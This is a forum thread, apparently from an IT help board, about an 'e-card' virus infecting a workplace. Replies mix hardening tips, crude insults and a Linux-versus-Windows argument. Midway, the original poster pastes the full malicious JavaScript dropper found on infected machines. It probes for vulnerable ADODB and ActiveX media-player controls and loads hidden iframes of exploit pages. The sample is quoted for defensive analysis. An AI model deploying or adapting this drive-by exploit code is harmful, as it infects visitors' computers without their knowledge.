i will keep this short.

where i work the e-card virus seems to be running rampant. we know how to get rid of it, but are at a loss as to how to stop the infection in the first place. i wish we could rely on an email saying "hey fuckers e-card will fuck your shit up dont go near it" but as anyone who has ever worked in I.T would know, end users are their own worst enemies.

does anybody know any decent info about this virus, apart from the general stuff i can dredge up from google. if anyone has a copy of this virus i would be very interested in getting a copy (i will dl on mah shitty comp) so the security team here can study it.


muchas gracias amigos

Migrate to GNU/Linux.

Don't switch to a Linux based OS, you will get your brain haxxed.

First, pull the wire.
(Ya don't want people to steal ya buziness secrests, don't ya?)
Second, reinstall windows on every workstations and load deepfreeze on all of them.
(Don't backup ANY executable)
(Protect yourself from lusers)
Third, follow basic, small office/home hardening steps:

You don't *add* security, you remove what is insecure, you monitor what is sensitive and you establish *trust* relationships between nodes.

I will attempt to describe what basic hardening an home network/computer should go trough. ( DSL, behind a nat ).

[Router configuration]
Disable wireless if you don't need it.
Disable upnp.
Foward the ports used to configure the router to a non-existent node (usually only 80).
Change the router's password to a strong one. (also the default account name, if you can)
Use OpenDNS.
Disable dhcpd.

[Host configuration] (Windows)
Go to services.msc and disable what ever you don't need.
Install an anti-virus.
Upgrade to Vista, don't use the admin account as a main account. DO NOT disable UAC, it's the only fucking reason i'm advising you to upgrade to vista if you didn't already.
Install the updates. (This is THE most important part in the Host configuration)

Dont use p2p, if you do, use torrents, exclusively.
Make use of a password and disable the guest, don't enable public sharing, don't install third party apps that aren't:
From a major company (Oracle, Microsoft [...] )
With a very high price tag
Open Source (OSI approved license)
(not even a yahoo/google/whatever widget)

Particularily DO NOT install third party drivers, or even download those from the web site, install only from the cd and patch them
No cracks, warez, mods [...]
.
DON'T even type any personal info and/or make use of a webcam.
Disable flash, javascript and java in your web browser.
(or make use of a different profile)
Don't use common protocols that are known to be phisher's paradise, MSN, e-mail [...].

A tad bit more advanced:
Setup a rescue live cd, backups and integrity checks.
Encrypt the shit out of sensitive data.
Setup an hardware firewall.
[...] Will add more later if anybody is interested... or even got trough the whole thing.

Forth, in your situation, it'd setup a firewall.
pf from the OpenBSD project will do, you can find more at openbsd dot org.

umm....he works in an IT dept. i dont think that was the question he was asking.

I doubt it'd be a good idea to have your security team 'study' it. There's probably a signature or way to detect it. I'd just have your mailserver start scanning everything.

the problem we have is it infects the resident antivirus .dll files, which spoofs an "all clear" when you scan.
the other problem is that it seems to bypass the mail filtering system as well and we are at a loss to how! we have sent global mail to warn everyone of the virus but we all know end users arent very careful and so we keep getting this virus. its also a complete bastard to remove!


we have however found the .htm file that infects machines, as it stores it locally in the temp folders


<HTML><BODY>
<script>window.onerror=function(){return true;}</script>
<Script Language="JavaScript">
var DDDDDDD = "QQ000000000";
var cook = "DDDDDDD";

function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}

function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}

function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}

function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}

register(cook);

window.defaultStatus="about:blank";

try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<iframe width=50 height=0 src=06014.htm></iframe>")}
else
{
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){
document.write('<iframe width=10 height=0 src=realplay.htm></iframe>')}}

try{ var k;
var glworldn=new ActiveXObject("GLIEDown.IEDown.1");}
catch(k){};
finally{if(k!="[object Error]"){
document.write('<iframe style=display:none src=lz_new.htm></iframe>')}}

try{ var g;
var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}

try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=yyfb.htm></iframe>')}}

try{ var p;
var qvod=new ActiveXObject("QvodInsert.QvodCtrl.1");}
catch(p){};
finally{if(p!="[object Error]"){
document.write('<iframe width=10 height=0 src=yahoo.htm></iframe>')}}

try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xunlei5.htm></iframe>')}}

document.write('<iframe style=display:none src=07004.htm></iframe>')

if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]" && p=="[object Error]" && k=="[object Error]")
{location.replace("about:blank");}
}}
}

openWM();
</script>
</BODY></HTML>


which by the looks of things sets tracking cookies which rename daily and adds several registry strings. this is based on my interpretation however, as i am not very good with javascript!

what could plausibly be done about this, apart from disabling javascript (not possible as many end users frequent business sites that use it)?

You could just switch over to GNU/Linux. It probably isn't that hard for you to do (especially if you're re-imaging machines every time they get infected) and will save you money.

Free as in free speech and free as in "free from viruses". (http://gnewsense.org)

You could just switch over to GNU/Linux. It probably isn't that hard for you to do (especially if you're re-imaging machines every time they get infected) and will save you money.

Free as in free speech and free as in "free from viruses". (http://gnewsense.org)

To even suggest that Linux is "free from viruses" is completely wrong. Even to suggest it, which is why I believe you had the quotes around it, is just dumb.

To even suggest that Linux is "free from viruses" is completely wrong. Even to suggest it, which is why I believe you had the quotes around it, is just dumb.

You're really stretching in your anit-freedom trolling now. First you throw a fit that I say GNU/Linux, and now you're pulling shit out of your ass about viruses.

Name one virus for GNU/Linux in the wild right now. Name one that can spread via the same vector as the one in OP, and then we can talk.

And just for the record, Linux has no viruses at all. It's just a kernel. So your post is completely wrong.

if you met some of the end users here.....

unfortunately, as this is a large company and i am only a junior, they aint changing shit! and yeah i know about linux and all the other operating systems there are. i find linux quite hard to get to grips with as i am natively a windows user. if i am finding it hard, the average end user will probably curl up in a foetal position and hide under their desk.

"i can't get remote working to work, the computer says i need to restart"
"have you restarted the computer?"
"no"

you want to explain how to untar and build an install package to these people be my guest. one user actually had a panic attack when she couldnt find the start bar.

but back to the topic: does anyone know any useful information about the e-card virus, such as the payload etc? i have found one file: osceprot.dll which seems to infect whatever resident antivirus is present and renders it useless. so far avast! and a program called SDFix are the only things that detect anything, but they arent able to completely cure it. any ideas besides changing OS?

if you met some of the end users here.....

unfortunately, as this is a large company and i am only a junior, they aint changing shit! and yeah i know about linux and all the other operating systems there are. i find linux quite hard to get to grips with as i am natively a windows user. if i am finding it hard, the average end user will probably curl up in a foetal position and hide under their desk.

"i can't get remote working to work, the computer says i need to restart"
"have you restarted the computer?"
"no"

you want to explain how to untar and build an install package to these people be my guest. one user actually had a panic attack when she couldnt find the start bar.

but back to the topic: does anyone know any useful information about the e-card virus, such as the payload etc? i have found one file: osceprot.dll which seems to infect whatever resident antivirus is present and renders it useless. so far avast! and a program called SDFix are the only things that detect anything, but they arent able to completely cure it. any ideas besides changing OS?

Why are you users installing anything?

That seems to be the first problem. (The second problem is that you don't need to build anything on GNU/Linux; everything you need is in the package manager. Read the damn docs.)

Get an environment where your users are not trusted. Your users are idiots. They install viruses, bypass security measures, and are idiots. Set up windows so that they all have lower privileges than Solitaire, put ALL the files on a central server (no clue how to do this on ms, easy as fuck on GNU/Linux), and give them maybe 200MB home folders.

Also, delay email for a day and scan it with everything in existence. Disallow executable attachments or attachments you find to be executable. Disallow archives containing executables. Disassemble java files, read the source, and then email that to your users with instruction to put it through a script that runs it in a sandbox.

Seeing as you're only junior, you can do none of this. But proposing it will make you look good. Also, any user that gets the virus, punt them off of the network until their system is reimaged.

Complete network admin jackbooted nazism.

I like it.

You're really stretching in your anit-freedom trolling now. First you throw a fit that I say GNU/Linux, and now you're pulling shit out of your ass about viruses.

Name one virus for GNU/Linux in the wild right now. Name one that can spread via the same vector as the one in OP, and then we can talk.

And just for the record, Linux has no viruses at all. It's just a kernel. So your post is completely wrong.


Hehehe, anti-freedom trolling. I didn't know that I was trolling. Then again, I could be just for the sake of pissing you off? Now, like I said, you would be an asshat to even suggest such a thing like "virus free". You show me an operating system that can not be infected by a virus/malicious code and I'll give up a right nut. Now, just because there isn't a virus in the wild at the moment does not mean that it can not be infected. Just because I can't name one that spreads via the same vector doesn't mean shit. You're just trying to prove a point that doesn't exist and isn't on your side. And by the way, there have been and they CAN be to infect/use kernel processes. So, saying that Linux is a kernel and it can not be infected is just so much bullshit.

Hehehe, anti-freedom trolling. I didn't know that I was trolling. Then again, I could be just for the sake of pissing you off? Now, like I said, you would be an asshat to even suggest such a thing like "virus free". You show me an operating system that can not be infected by a virus/malicious code and I'll give up a right nut. Now, just because there isn't a virus in the wild at the moment does not mean that it can not be infected. Just because I can't name one that spreads via the same vector doesn't mean shit. You're just trying to prove a point that doesn't exist and isn't on your side. And by the way, there have been and they CAN be to infect/use kernel processes. So, saying that Linux is a kernel and it can not be infected is just so much bullshit.

What's your vector into the kernel?

And yeah, you wouldn't, wouldn't you :p

What's your vector into the kernel?

And yeah, you wouldn't, wouldn't you :p

My vector: insmod
It requires root privs, but hey -- enough users still run as root to make it possible.

My vector: insmod
It requires root privs, but hey -- enough users still run as root to make it possible.

No, into _just_ the kernel.

insmod isn't part of the kernel, and you don't have a shell to run it in.

We're talking a Linux system here, not a GNU/Linux system. :)

Why are you users installing anything?

That seems to be the first problem. (The second problem is that you don't need to build anything on GNU/Linux; everything you need is in the package manager. Read the damn docs.)

Get an environment where your users are not trusted. Your users are idiots. They install viruses, bypass security measures, and are idiots. Set up windows so that they all have lower privileges than Solitaire, put ALL the files on a central server (no clue how to do this on ms, easy as fuck on GNU/Linux), and give them maybe 200MB home folders.

Also, delay email for a day and scan it with everything in existence. Disallow executable attachments or attachments you find to be executable. Disallow archives containing executables. Disassemble java files, read the source, and then email that to your users with instruction to put it through a script that runs it in a sandbox.

Seeing as you're only junior, you can do none of this. But proposing it will make you look good. Also, any user that gets the virus, punt them off of the network until their system is reimaged.

What a complete and utter douche.

I'm glad our IT manager isn't one of your types. Granted, he probably has a range of severe psychological defects as well... It's not hard to see that your little fascist network fantasy reflects the total lack of power and strength your character lacks.

What a complete and utter douche.

I'm glad our IT manager isn't one of your types. Granted, he probably has a range of severe psychological defects as well... It's not hard to see that your little fascist network fantasy reflects the total lack of power and strength your character lacks.

Look, do you want to pay for the machines you break? Or the time it takes to fix them?

It isn't your damn hardware. Don't get pissy when the actual owner lets you know that.

Sounds to me like a PEBKAC thou if you can figure out how to solve this im sure you would be a millionaire i know MS has been trying to solve PEBKAC's for years but i will never happen